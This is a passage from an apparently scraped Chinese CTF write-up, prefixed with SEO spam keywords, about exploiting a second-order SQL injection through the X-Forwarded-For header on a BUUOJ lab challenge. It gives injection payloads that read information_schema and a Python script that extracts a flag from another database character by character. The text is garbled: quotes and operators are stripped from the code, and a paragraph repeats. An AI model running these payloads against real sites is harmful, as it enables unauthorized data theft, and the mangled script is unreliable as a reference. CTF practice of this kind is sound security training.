网站建设+开源,wordpress 标签挂件,合肥专业做淘宝网站推广,上海网站策划这几天也是ctf做得有点头疼了。好些序列化的题没碰#xff0c;一直做些sql注入类的题目。闲来无事#xff0c;在更一次sql注入吧。 整个页面就这点信息。首先想想为什么他能获取你的ip。猜测是数据包X-Forwarded-For。 它还输出上次访问页面客户端的ip。很明显了#xff0c…这几天也是ctf做得有点头疼了。好些序列化的题没碰一直做些sql注入类的题目。闲来无事在更一次sql注入吧。 整个页面就这点信息。首先想想为什么他能获取你的ip。猜测是数据包X-Forwarded-For。 它还输出上次访问页面客户端的ip。很明显了多半是二次注入
X-Forwarded-For:0or 1 or0
当构造这样的payload的时候。
1.先构造payload点击发送
2.在换一个随便的ip点击发送
3.在次点击发送
last ip就变成1了。说明的确是sql二次注入 这个原理就和上次网鼎杯那个sql注入一样。要是使用传统的注入就太慢了。因此我们构造这样的payload
0 (ASCII(SUBSTR((select group_concat(schema_name) from information_schema.schemata),1,1))) 0
sql语句的含义是将数据库的第一个字母的ascii码于0相加。(mysql数据库是运算符) 这个last ip就等于105了。这关也没过滤啥。通过这个方法就可以构造脚本了。
import requests
flag
urlhttp://node5.buuoj.cn:25578/
for i in range(1,500):srequests.session()# (ASCII(SUBSTR((select group_concat(schema_name) from information_schema.schemata),{},1)))# (ASCII(SUBSTR((select(group_concat(table_name))FROM(information_schema.TABLES)where(table_schema)F4l9_D4t4B45e),{},1)))# F4l9_t4b1e# (ASCII(SUBSTR((select(group_concat(column_name))from(information_schema.columns)where(table_nameF4l9_t4b1e)),{},1)))# F4l9_C01uMn# (ASCII(SUBSTR((select(group_concat(F4l9_C01uMn))from(F4l9_t4b1e)),1,1)))headers{X-Forwarded-For:0(ASCII(SUBSTR((select(group_concat(F4l9_C01uMn))from(F4l9_D4t4B45e.F4l9_t4b1e)),{},1)))0.format(i),Cookie:_gaGA1.1.1748561756.1709982957; _ga_0WLTHS96P4GS1.1.1709982957.1.1.1709982979.0.0.0; track_uuid87ee5b24-ee01-43dc-ee18-fca0644f3e53}headers1{X-Forwarded-For:1,Cookie:_gaGA1.1.1748561756.1709982957; _ga_0WLTHS96P4GS1.1.1709982957.1.1.1709982979.0.0.0; track_uuid87ee5b24-ee01-43dc-ee18-fca0644f3e53}datas.get(url,headersheaders)data1s.get(url,headersheaders1)data2s.get(url,headersheaders1)ydata2.textxy.split(\n)[-1]zx[9:]flagflagchr(int(z.split( )[0]))print(flag)
最后还要注意的一点就是这里是跨库查询。flag不在当前数据库。我们第一步必须要先爆库名。
最后一步获取数据是也别忘记F4l9_D4t4B45e.F4l9_t4b1e,代表F4l9_D4t4B45e数据库下的F4l9_t4b1e表。 这就是最后跑出来的结果了
